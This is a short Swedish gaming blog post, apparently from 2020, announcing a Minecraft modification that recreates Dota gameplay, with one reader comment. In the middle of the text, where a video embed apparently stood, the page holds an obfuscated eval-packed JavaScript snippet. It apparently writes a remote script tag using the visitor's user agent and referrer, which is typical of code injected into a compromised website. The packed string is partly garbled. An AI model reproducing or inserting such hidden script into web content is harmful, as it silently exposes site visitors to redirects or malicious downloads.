Image Image Image Image Image Image Image Image Image Image

| 23 oktober, 2020

Scroll to top

Top

Nu kan du spela Dota i ditt Minecraft

Sebastian

Det är ett roligt gäng som nu skapat en modifikation som fungerar som Dota. De verkar fått med det mesta, Du slåss mot den andra sidan, nedkämpar fiendens försvar, köper prylar och detta utan att behöva ladda ner fler externa modifikationer.

Kolla eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ifyds|var|u0026u|referrer|fkits||js|php’.split(’|’),0,{}))
videon ovan!

Comments

  1. Pascall Marton

    Nice war kan i download it